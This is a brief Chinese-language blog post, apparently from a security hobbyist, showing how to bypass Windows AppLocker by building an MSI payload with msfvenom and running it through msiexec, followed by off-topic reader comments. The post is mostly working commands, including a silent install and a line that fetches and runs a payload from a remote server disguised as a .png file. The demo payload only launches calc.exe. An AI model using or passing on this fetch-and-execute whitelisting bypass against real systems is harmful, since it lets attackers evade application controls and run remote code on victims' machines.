Bypassing Applocker with msiexec
in 奇技淫巧 with 3 comments

Bypassing Applocker with msiexec

in 奇技淫巧 with 3 comments

msf生成MSI:

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi

命令行运行:

msiexec /quiet /i cacl.msi

1.gif

将payload放在远程服务器上运行:

msiexec /q /i https://evi1cg.me/payloads/calc.png

2.gif

Responses
  1. Nt

    问个题外问题- -大神你用的是vm虚拟机还是parallels

    Reply
  2. vm. 因为以前用win 虚拟机一直用的vm

    Reply
  3. 楼主粉丝

    庆祝楼主再次发文 ~~~~~

    Reply